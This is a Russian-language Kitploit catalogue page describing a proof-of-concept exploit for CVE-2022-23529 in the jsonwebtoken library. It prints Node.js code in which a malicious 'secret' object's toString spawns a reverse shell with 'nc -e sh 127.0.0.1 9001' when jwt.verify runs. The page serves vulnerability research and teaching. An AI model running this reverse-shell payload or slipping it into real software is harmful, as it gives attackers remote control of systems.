Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-23529-Exploration — Эксплойт proof-of-concept для CVE-2022-23529, демонстрирующий RCE в уязвимых JWT-библиотеках через вредоносные объекты секретов HMAC. | Kitploit
Инструменты/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

Эксплойт proof-of-concept для CVE-2022-23529, демонстрирующий RCE в уязвимых JWT-библиотеках через вредоносные объекты секретов HMAC.

Репозиторий
3 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-23529

Библиотека JSON Web Token (JWT) версий до 3.4.6, 4.0.4 и 4.1.5 уязвима для удаленного выполнения кода (RCE).

Функции хеширования HMAC принимают на вход любую строку, что приводит к RCE.

Из-за предварительных условий эта уязвимость, скорее всего, не эксплуатируема.

Чтобы воспользоваться этой уязвимостью, атакующему необходимо выполнение одного из следующих условий:

  • Сервер не хранит секретные ключи безопасно.
  • Атакующий должен иметь доступ и контроль над секретными ключами.

npm install [email protected]

var jwt = require('jsonwebtoken');

create a token using the servers secret

var token = jwt.sign({"x":"y"}, 'servers_secret');

create malicious object containing a reverse shell (node.js)

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

server verifies the token using malicious object stored as secret

jwt.verify(token, poisoned_secret_on_server);

Скачать инструмент